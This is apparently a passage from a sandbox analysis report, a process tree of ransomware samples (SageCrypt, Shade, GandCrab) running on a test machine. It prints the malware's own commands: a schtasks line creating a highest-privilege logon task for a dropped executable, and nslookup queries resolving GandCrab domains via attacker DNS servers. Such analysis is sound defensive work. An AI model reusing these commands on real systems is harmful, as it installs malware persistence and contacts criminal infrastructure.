                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:7916
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:7988
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:6244
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:5160
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:8036
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:4044
  • C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    4⤵
      PID:8020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8064
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\syswow64\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\syswow64\explorer.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1136
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6048
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
      PID:5824
      • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
        "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
        6⤵
        • Executes dropped EXE
        PID:4892
        • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
          "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
          7⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:1896
          • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
            "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
            8⤵
            • Executes dropped EXE
            PID:2828
            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe
              "C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.SageCrypt.ees-e20b494c08c966b6ac3ba78269cfbcfa0233c8ae00a3f4e39a207970bdcef43a.exe" g
              9⤵
              PID:1404
• C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
  3⤵
  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3396
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
  6⤵
  • Executes dropped EXE
  PID:5804
• C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
  "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
  7⤵
  PID:2068
• C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\__config252888.bat"
  3⤵
  PID:3256
• C:\Windows\SysWOW64\PING.EXE
  ping 127.0.0.1 -n 2
  4⤵
  • System Network Configuration Discovery: Internet Connection Discovery
  • Runs ping.exe
  PID:108
• C:\Windows\SysWOW64\PING.EXE
  ping 127.0.0.1 -n 2
  4⤵
  • System Network Configuration Discovery: Internet Connection Discovery
  • Runs ping.exe
  PID:3572
• C:\Windows\SysWOW64\PING.EXE
  ping 127.0.0.1 -n 2
  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3040
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
  • System Network Configuration Discovery: Internet Connection Discovery
  • Runs ping.exe
  PID:5792
• C:\Windows\SysWOW64\PING.EXE
  ping 127.0.0.1 -n 2
  4⤵
  • System Location Discovery: System Language Discovery
  • System Network Configuration Discovery: Internet Connection Discovery
  • Runs ping.exe
  PID:2168
• C:\Windows\SysWOW64\PING.EXE
  ping 127.0.0.1 -n 2
  4⤵
  • System Network Configuration Discovery: Internet Connection Discovery
  • Runs ping.exe
  PID:5388
• C:\Windows\SysWOW64\PING.EXE
  ping 127.0.0.1 -n 2
  4⤵
  • System Network Configuration Discovery: Internet Connection Discovery
  • Runs ping.exe
  PID:6420
• C:\Windows\SysWOW64\PING.EXE
  ping 127.0.0.1 -n 2
  4⤵
  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6064
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  ping 127.0.0.1 -n 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00361\Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Trojan-Ransom.Win32.Shade.pfi-2b703b07e6eba207d2e29360e1f5b48d2d75c0c7d927d2cce973204021188b82.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
  • Adds Run key to start application
  • Suspicious behavior: CmdExeWriteProcessMemorySpam
  • Suspicious use of UnmapMainImage
  PID:2192
• C:\Users\Admin\Desktop\00361\UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe
  UDS-Trojan-Ransom.Win32.GandCrypt.a-0f7a8548525448781c3704cc6e1e7153a31d0a68bd91363b0e744b9883660556.exe
  2⤵
  • Executes dropped EXE
  • Adds Run key to start application
  • Enumerates connected drives
  • Checks processor information in registry
  • Suspicious behavior: CmdExeWriteProcessMemorySpam
  • Suspicious behavior: EnumeratesProcesses
  PID:752
  • C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.coin dns1.soprodns.ru
    3⤵
    PID:3152
  • C:\Windows\SysWOW64\nslookup.exe
    nslookup nomoreransom.bit dns1.soprodns.ru
    3⤵
    PID:3640
  • C:\Windows\SysWOW64\nslookup.exe
    nslookup gandcrab.bit dns2.soprodns.ru
    3⤵
    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    nslookup nomoreransom.coin dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5468
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      nslookup nomoreransom.bit dns2.soprodns.ru
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5692
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        nslookup gandcrab.bit dns1.soprodns.ru
